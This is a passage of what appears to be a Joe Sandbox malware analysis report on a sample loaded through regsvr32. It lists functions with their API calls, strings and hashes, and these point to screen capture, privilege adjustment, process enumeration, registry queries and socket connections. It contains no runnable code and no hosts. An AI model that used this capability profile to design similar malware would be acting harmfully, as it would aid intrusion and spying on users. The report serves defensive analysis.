GetSystemMetrics.USER32 ref: 02E4EDA6
StretchBlt.GDI32 ref: 02E4EDEC
GetDIBits.GDI32 ref: 02E4EE91

Part of subcall function 02E55378: malloc.LIBCMT ref: 02E55392

DeleteObject.GDI32 ref: 02E4EF44
DeleteObject.GDI32 ref: 02E4EF4E
ReleaseDC.USER32 ref: 02E4EF59
DeleteObject.GDI32 ref: 02E4EFE7
DeleteObject.GDI32 ref: 02E4EFF1
ReleaseDC.USER32 ref: 02E4EFFC

Strings

gfff, xrefs: 02E4ECB8
gfff, xrefs: 02E4ECDE
, xrefs: 02E4EDAC

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch$BitmapBitsDesktopModeSelectWindowmalloc
String ID: $gfff$gfff
API String ID: 1524144516-4202476792
Opcode ID: 13dd4c7c1d2cbe625612e10cc7ad245c133778d1992cad39df60de0e299c626f
Instruction ID: 6ece48d3f3415111c439134adff5c7fa7bf03dc3c3466cb2b9550cb72b90796c
Opcode Fuzzy Hash: 13dd4c7c1d2cbe625612e10cc7ad245c133778d1992cad39df60de0e299c626f
Instruction Fuzzy Hash: 66C1BF32714B408AE715DF72F41835D73B2BBA9B88F049226DE0A6BB58EF38D485C740

Function 00007FFE013D6280 Relevance: 42.5, APIs: 28, Instructions: 548memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FFE013D7E38
HeapFree.KERNEL32 ref: 00007FFE013D8006
HeapFree.KERNEL32 ref: 00007FFE013D81FF
HeapFree.KERNEL32 ref: 00007FFE013D8220
HeapFree.KERNEL32 ref: 00007FFE013D8241
HeapFree.KERNEL32 ref: 00007FFE013D859B
HeapFree.KERNEL32 ref: 00007FFE013D87FA

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4d4451614b536c495e735d598b063294f968a1afea2c43f30dd8b326bb227dcc
Instruction ID: 213033cc88fa0b59bc1c4d1984d577ca3a707a681da7899cfb3ee62efeecbe1d
Opcode Fuzzy Hash: 4d4451614b536c495e735d598b063294f968a1afea2c43f30dd8b326bb227dcc
Instruction Fuzzy Hash: 22427D72A0DBC681EB61DB12F8513AAA7A1FB98784F454136DACD4B7A9DF7CE044C700

Function 00007FFE013D4790 Relevance: 34.0, APIs: 18, Strings: 1, Instructions: 711memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFE013D47A6
SetFilePointerEx.KERNEL32 ref: 00007FFE013D484E
SetFilePointerEx.KERNEL32 ref: 00007FFE013D48DB
SetFilePointerEx.KERNEL32 ref: 00007FFE013D4937
HeapFree.KERNEL32 ref: 00007FFE013D7E38

Part of subcall function 00007FFE013D1770: HeapFree.KERNEL32 ref: 00007FFE013D178D
Part of subcall function 00007FFE013D1770: HeapFree.KERNEL32 ref: 00007FFE013D17BD
Part of subcall function 00007FFE013D1770: HeapFree.KERNEL32 ref: 00007FFE013D17D8
Part of subcall function 00007FFE013D1770: HeapFree.KERNEL32 ref: 00007FFE013D180E
Part of subcall function 00007FFE013D1770: CloseHandle.KERNEL32 ref: 00007FFE013D1824
Part of subcall function 00007FFE013D1770: CloseHandle.KERNEL32 ref: 00007FFE013D183A
Part of subcall function 00007FFE013D1770: CloseHandle.KERNEL32 ref: 00007FFE013D1853

Part of subcall function 00007FFE013D1660: HeapFree.KERNEL32 ref: 00007FFE013D167B

HeapFree.KERNEL32 ref: 00007FFE013D8006
HeapFree.KERNEL32 ref: 00007FFE013D81FF
HeapFree.KERNEL32 ref: 00007FFE013D8220
HeapFree.KERNEL32 ref: 00007FFE013D8241
HeapFree.KERNEL32 ref: 00007FFE013D859B
HeapFree.KERNEL32 ref: 00007FFE013D87FA

Strings

Could not find central directory endInvalid digital signature header, xrefs: 00007FFE013D487C

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle$FilePointer
String ID: Could not find central directory endInvalid digital signature header
API String ID: 3729840729-3300676640
Opcode ID: 76405ca92ebde2537bc6a3168250b5e8723cf425ba05093c219c2f78231ca4a8
Instruction ID: 517a7de1f2f6b93e2597894de340c6eb4b2e388a1d068bc81380af7a3e7016ef
Opcode Fuzzy Hash: 76405ca92ebde2537bc6a3168250b5e8723cf425ba05093c219c2f78231ca4a8
Instruction Fuzzy Hash: 5C724B62A0D7C280FB758B11E8987BEA7A0FB94784F414135DACD4ABE9EF7CD1448B00

Function 028773D0 Relevance: 32.9, APIs: 3, Strings: 15, Instructions: 1376registryCOMMON

Download Yara Rule

APIs

_wcsrev.LIBCMT ref: 02877411
RegOpenKeyExW.KERNEL32 ref: 02877D81
RegQueryValueExW.KERNEL32 ref: 02877DB5

Strings

|, xrefs: 02877F70
|, xrefs: 02878070
1, xrefs: 02878099
|, xrefs: 028777D0
|, xrefs: 02877890
|, xrefs: 028775C0
|, xrefs: 02877950
|, xrefs: 02877EA0
|, xrefs: 028776A0
|, xrefs: 02877B90
|, xrefs: 02877A10
|, xrefs: 02877AD0
|, xrefs: 02877D10
|, xrefs: 02877C50
|, xrefs: 028774E0

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: OpenQueryValue_wcsrev
String ID: 1$|$|$|$|$|$|$|$|$|$|$|$|$|$|
API String ID: 2336627112-483243098
Opcode ID: e7c24950faba3f9ac85f5f069f5f95afb0107786a1c82c81ace9b637109b25c1
Instruction ID: 6e434ee5842435468fcce2f26e078513ad23061993502125415224742910b75c
Opcode Fuzzy Hash: e7c24950faba3f9ac85f5f069f5f95afb0107786a1c82c81ace9b637109b25c1
Instruction Fuzzy Hash: 2F824B3C7649598BDB2D6F2899842F9B392F79130AB54C57EC487C3065EF78C486CB82

Function 02E43360 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 168
networkstringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResetEvent.KERNEL32 ref: 02E43391
timeGetTime.WINMM ref: 02E433A0
socket.WS2_32 ref: 02E433D5
lstrlenW.KERNEL32 ref: 02E43402
WideCharToMultiByte.KERNEL32 ref: 02E43426
lstrlenW.KERNEL32 ref: 02E43440
WideCharToMultiByte.KERNEL32 ref: 02E43463
gethostbyname.WS2_32 ref: 02E43470
htons.WS2_32 ref: 02E43498
connect.WS2_32 ref: 02E434C2

Strings

0u, xrefs: 02E43545

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$EventResetTimeconnectgethostbynamehtonssockettime
String ID: 0u
API String ID: 950253168-3203441087
Opcode ID: c675cf8a70220d83b9f5f9eeca867539601b1c5dcc2814c4a89447bde27aa509
Instruction ID: 3a6a164535aa7db64e3114e7449182a0613150735d3283505c0830940dbf43f7
Opcode Fuzzy Hash: c675cf8a70220d83b9f5f9eeca867539601b1c5dcc2814c4a89447bde27aa509
Instruction Fuzzy Hash: 6D714972218BC186D720CF61F44839AB7A5F788B98F505229EB8A57F68DF3CD149CB44

Function 00007FFE013E0170 Relevance: 22.8, APIs: 15, Instructions: 278
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 00007FFE013E018A
BCryptGenRandom.BCRYPT ref: 00007FFE013E01BF
SystemFunction036.ADVAPI32 ref: 00007FFE013E01DA
TlsGetValue.KERNEL32 ref: 00007FFE013E025A
TlsGetValue.KERNEL32 ref: 00007FFE013E03E6
TlsSetValue.KERNEL32 ref: 00007FFE013E03FD
HeapFree.KERNEL32 ref: 00007FFE013E041E
HeapFree.KERNEL32 ref: 00007FFE013E042F
TlsSetValue.KERNEL32 ref: 00007FFE013E0463
HeapFree.KERNEL32 ref: 00007FFE013E0575
HeapFree.KERNEL32 ref: 00007FFE013E05A0
TlsSetValue.KERNEL32 ref: 00007FFE013E05E7
HeapFree.KERNEL32 ref: 00007FFE013E0603
HeapFree.KERNEL32 ref: 00007FFE013E0614
TlsSetValue.KERNEL32 ref: 00007FFE013E0630

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: Value$FreeHeap$CryptFunction036RandomSystem
String ID:
API String ID: 624231926-0
Opcode ID: 96881aa8be81bc6c9a06c0c58ef5cacd55f85cad4fd9d0310701fa939e61b36d
Instruction ID: daca0eadcb1decfa5d187024d5cc0bcb644c27f2ac3f7ded7a8c620cd6236d33
Opcode Fuzzy Hash: 96881aa8be81bc6c9a06c0c58ef5cacd55f85cad4fd9d0310701fa939e61b36d
Instruction Fuzzy Hash: 0FD19C21A0CBC281F72A9B25A4013F9A3E1FFA4754F455135EA8C1A7BAEF7CE5858700

Function 00007FFE013D4703 Relevance: 21.6, APIs: 11, Strings: 1, Instructions: 624COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFE013D47B8
SetFilePointerEx.KERNEL32 ref: 00007FFE013D484E
SetFilePointerEx.KERNEL32 ref: 00007FFE013D48DB
SetFilePointerEx.KERNEL32 ref: 00007FFE013D4937

Part of subcall function 00007FFE013ED4A0: WaitForSingleObject.KERNEL32 ref: 00007FFE013ED500

Strings

Could not find central directory endInvalid digital signature header, xrefs: 00007FFE013D487C

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: FilePointer$CloseHandleObjectSingleWait
String ID: Could not find central directory endInvalid digital signature header
API String ID: 3992305260-3300676640
Opcode ID: 036b575cc89000b2fd40ffa735cc0d0fb344bb2fd8885059b496147cbebe2792
Instruction ID: 881d3d6f381ad04254f24c61709bfabc9c6ef2b6bb665388363276645a090225
Opcode Fuzzy Hash: 036b575cc89000b2fd40ffa735cc0d0fb344bb2fd8885059b496147cbebe2792
Instruction Fuzzy Hash: DD523962A0D7D280FB758B11E8987BEA7A0FB94784F414135DA8C4BBE9EF7CD1458B00

Function 00007FFE013D474F Relevance: 21.6, APIs: 11, Strings: 1, Instructions: 618memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFE013D47B8
SetFilePointerEx.KERNEL32 ref: 00007FFE013D484E
SetFilePointerEx.KERNEL32 ref: 00007FFE013D48DB
SetFilePointerEx.KERNEL32 ref: 00007FFE013D4937
SetFilePointerEx.KERNEL32 ref: 00007FFE013D4C1E
GetLastError.KERNEL32 ref: 00007FFE013D712E
GetLastError.KERNEL32 ref: 00007FFE013D715D
HeapFree.KERNEL32 ref: 00007FFE013D72B2
HeapFree.KERNEL32 ref: 00007FFE013D72D3
HeapFree.KERNEL32 ref: 00007FFE013D7311
HeapFree.KERNEL32 ref: 00007FFE013D7341
HeapFree.KERNEL32 ref: 00007FFE013D738B
HeapFree.KERNEL32 ref: 00007FFE013D73D1
HeapFree.KERNEL32 ref: 00007FFE013D73E9
HeapFree.KERNEL32 ref: 00007FFE013D740C
HeapFree.KERNEL32 ref: 00007FFE013D742D
CloseHandle.KERNEL32 ref: 00007FFE013D7437
HeapFree.KERNEL32 ref: 00007FFE013D7513
GetLastError.KERNEL32 ref: 00007FFE013D751A
CloseHandle.KERNEL32 ref: 00007FFE013D7571
GetLastError.KERNEL32 ref: 00007FFE013D78D9
HeapFree.KERNEL32 ref: 00007FFE013D7E38
HeapFree.KERNEL32 ref: 00007FFE013D8006
HeapFree.KERNEL32 ref: 00007FFE013D81FF
HeapFree.KERNEL32 ref: 00007FFE013D8220
HeapFree.KERNEL32 ref: 00007FFE013D8241
HeapFree.KERNEL32 ref: 00007FFE013D859B
HeapFree.KERNEL32 ref: 00007FFE013D87FA

Strings

Could not find central directory endInvalid digital signature header, xrefs: 00007FFE013D487C

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: FreeHeap$ErrorFileLastPointer$CloseHandle
String ID: Could not find central directory endInvalid digital signature header
API String ID: 3659737114-3300676640
Opcode ID: 34bb2e9324b9c136921aafcc7062f9037ab6217559ecc4926c0ca6934dd32b7d
Instruction ID: 3cc70720171d3a0450a89bbe3cf54a247b53eb9e1d9bf59f35fe0ffab2f0bce8
Opcode Fuzzy Hash: 34bb2e9324b9c136921aafcc7062f9037ab6217559ecc4926c0ca6934dd32b7d
Instruction Fuzzy Hash: CB523862A0D7D280FB758B11E8987BEA7A0FB94784F414135DACD0BBA9EF7CD1458B00

Function 02E5FF94 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 292
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_lock.LIBCMT ref: 02E5FFBF

Part of subcall function 02E62CBC: _amsg_exit.LIBCMT ref: 02E62CE6

_get_daylight.LIBCMT ref: 02E5FFD5

Part of subcall function 02E60D30: _errno.LIBCMT ref: 02E60D39
Part of subcall function 02E60D30: _invalid_parameter_noinfo.LIBCMT ref: 02E60D44

_get_daylight.LIBCMT ref: 02E5FFEA

Part of subcall function 02E60CD0: _errno.LIBCMT ref: 02E60CD9
Part of subcall function 02E60CD0: _invalid_parameter_noinfo.LIBCMT ref: 02E60CE4

_get_daylight.LIBCMT ref: 02E5FFFF

Part of subcall function 02E60D00: _errno.LIBCMT ref: 02E60D09
Part of subcall function 02E60D00: _invalid_parameter_noinfo.LIBCMT ref: 02E60D14

___lc_codepage_func.LIBCMT ref: 02E6000C

Part of subcall function 02E5A770: _getptd.LIBCMT ref: 02E5A774

Part of subcall function 02E67620: __wtomb_environ.LIBCMT ref: 02E67650

free.LIBCMT ref: 02E6007D

Part of subcall function 02E55280: HeapFree.KERNEL32 ref: 02E55296
Part of subcall function 02E55280: _errno.LIBCMT ref: 02E552A0
Part of subcall function 02E55280: GetLastError.KERNEL32 ref: 02E552A8

free.LIBCMT ref: 02E600E6
GetTimeZoneInformation.KERNEL32 ref: 02E600F9
WideCharToMultiByte.KERNEL32 ref: 02E601AF
WideCharToMultiByte.KERNEL32 ref: 02E60202

Strings

Eastern Standard Time, xrefs: 02E601A4
Eastern Summer Time, xrefs: 02E601F7

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 2532449802-239921721
Opcode ID: 0c97cee6d145cff3ac5e51c77ab776f690a74dde89f2690ff405645e1eb8e359
Instruction ID: 274903a41e6e04e656fc22af4b1bb27c0985c8753b74ef759218f627ae253abd
Opcode Fuzzy Hash: 0c97cee6d145cff3ac5e51c77ab776f690a74dde89f2690ff405645e1eb8e359
Instruction Fuzzy Hash: C8B1D2322D47E08ADB24DF25E49877A7BA6F7857C8F44E125AA8E53B65DF38C411CB00

Function 02E474F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 199
stringregistrycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32 ref: 02E475AB
lstrcatW.KERNEL32 ref: 02E475BB

Part of subcall function 02E4A900: GetCurrentProcess.KERNEL32 ref: 02E4A917
Part of subcall function 02E4A900: OpenProcessToken.ADVAPI32 ref: 02E4A928
Part of subcall function 02E4A900: LookupPrivilegeValueW.ADVAPI32 ref: 02E4A948
Part of subcall function 02E4A900: AdjustTokenPrivileges.ADVAPI32 ref: 02E4A970
Part of subcall function 02E4A900: GetLastError.KERNEL32 ref: 02E4A976
Part of subcall function 02E4A900: CloseHandle.KERNEL32 ref: 02E4A986

Part of subcall function 02E4A600: CreateToolhelp32Snapshot.KERNEL32 ref: 02E4A637

CoCreateInstance.OLE32 ref: 02E47606
wsprintfW.USER32 ref: 02E47703
RegOpenKeyExW.ADVAPI32 ref: 02E4772A
RegQueryValueExW.ADVAPI32 ref: 02E47778
lstrcatW.KERNEL32 ref: 02E4778C
lstrcatW.KERNEL32 ref: 02E4779C
RegCloseKey.ADVAPI32 ref: 02E477A6

Part of subcall function 02E47400: CreateToolhelp32Snapshot.KERNEL32 ref: 02E47441
Part of subcall function 02E47400: Process32FirstW.KERNEL32 ref: 02E47460
Part of subcall function 02E47400: Process32NextW.KERNEL32 ref: 02E474A0
Part of subcall function 02E47400: CloseHandle.KERNEL32 ref: 02E474AD

lstrlenW.KERNEL32 ref: 02E477DD
lstrcatW.KERNEL32 ref: 02E477F1

Part of subcall function 02E4A550: GetModuleHandleA.KERNEL32 ref: 02E4A55D
Part of subcall function 02E4A550: GetProcAddress.KERNEL32 ref: 02E4A575
Part of subcall function 02E4A550: GetProcAddress.KERNEL32 ref: 02E4A58C
Part of subcall function 02E4A550: GetProcAddress.KERNEL32 ref: 02E4A5A3

Strings

CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 02E476F8

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: lstrcat$AddressCloseCreateHandleProc$OpenProcessProcess32SnapshotTokenToolhelp32Value$AdjustCurrentErrorFirstInstanceLastLookupModuleNextPrivilegePrivilegesQuerylstrlenwsprintf
String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}
API String ID: 1729154408-4035668053
Opcode ID: 1d2b676108bdf634e983210c69edc8232fb219044d9aa69fb5ef76e773f646e8
Instruction ID: db1c5d4b4e7686e3cdbc123892969e2142933b17fba82b04c6148ecc6f030451
Opcode Fuzzy Hash: 1d2b676108bdf634e983210c69edc8232fb219044d9aa69fb5ef76e773f646e8
Instruction Fuzzy Hash: 79917872744B808AEB10CF66E85879D7BB1FB88B98F409116DE8D5BB68DF38C505CB40

Function 00007FFE01417C90 Relevance: 20.0, APIs: 13, Instructions: 457
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FFE01417CF0
ProcessPrng.BCRYPTPRIMITIVES ref: 00007FFE01417D1C
HeapFree.KERNEL32 ref: 00007FFE01417DC7

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: Process$CurrentFreeHeapPrng
String ID:
API String ID: 2687294623-0
Opcode ID: 51e85cc9d2bc279701434e76395c5df1d6418b4a4d3ee09d6bf8df07b93857f3
Instruction ID: 6fb2490f705c97fad4c5cc13b5571b41d52899e2de1272b6b59cd7583a222776
Opcode Fuzzy Hash: 51e85cc9d2bc279701434e76395c5df1d6418b4a4d3ee09d6bf8df07b93857f3
Instruction Fuzzy Hash: 2012C322A08B8289E754CF25D8103BA3BA1FB487A8F544635EE6E4B7F5DF7CE5458340

Function 02E47BF0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E466A0: SysFreeString.OLEAUT32 ref: 02E466FD
Part of subcall function 02E466A0: SysAllocString.OLEAUT32 ref: 02E46749

GetTokenInformation.ADVAPI32 ref: 02E47C66
GetLastError.KERNEL32 ref: 02E47C70
GetProcessHeap.KERNEL32 ref: 02E47C83
HeapAlloc.KERNEL32 ref: 02E47C92
GetTokenInformation.ADVAPI32 ref: 02E47CBE
LookupAccountSidW.ADVAPI32 ref: 02E47CFC
GetLastError.KERNEL32 ref: 02E47D06
GetProcessHeap.KERNEL32 ref: 02E47D56
HeapFree.KERNEL32 ref: 02E47D64

Strings

NONE_MAPPED, xrefs: 02E47D13
Network, xrefs: 02E47BF0

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountLookup
String ID: NONE_MAPPED$Network
API String ID: 1972796461-3150097737
Opcode ID: ac7feef6db6130654831ced217b9bb5803c1e798a4c6bdfe98388abe7cb67064
Instruction ID: 9ffc211dc4c46ff0e2511aac6d5244ef4a8c4a001aaab9c44555fc8d11295bce
Opcode Fuzzy Hash: ac7feef6db6130654831ced217b9bb5803c1e798a4c6bdfe98388abe7cb67064
Instruction Fuzzy Hash: 21416032358A8186EE20DB11F84879AB365FBDAB99F849021DE4A47F54EF7CD509CB40

Function 02E48A70 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 82
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 02E48A85
GetProcAddress.KERNEL32 ref: 02E48AA1
FreeLibrary.KERNEL32 ref: 02E48BCD

Part of subcall function 02E5553C: _vswprintf_s_l.LIBCMT ref: 02E55556

Part of subcall function 02E489F0: GetModuleHandleW.KERNEL32 ref: 02E48A1B
Part of subcall function 02E489F0: GetProcAddress.KERNEL32 ref: 02E48A2B
Part of subcall function 02E489F0: GetNativeSystemInfo.KERNEL32 ref: 02E48A3B

RegOpenKeyExW.ADVAPI32 ref: 02E48B67
RegQueryValueExW.ADVAPI32 ref: 02E48B92
RegCloseKey.ADVAPI32 ref: 02E48BB7

Strings

%d.%d.%d, xrefs: 02E48AE6
RtlGetNtVersionNumbers, xrefs: 02E48A97
ntdll.dll, xrefs: 02E48A7B
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02E48B46
ProductName, xrefs: 02E48B7E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValue_vswprintf_s_l
String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
API String ID: 1477497710-3190923360
Opcode ID: 8fccf4e8e9dfffdbce54dd016b3a3e640cc6c4c560ac19f32a706210135c0e15
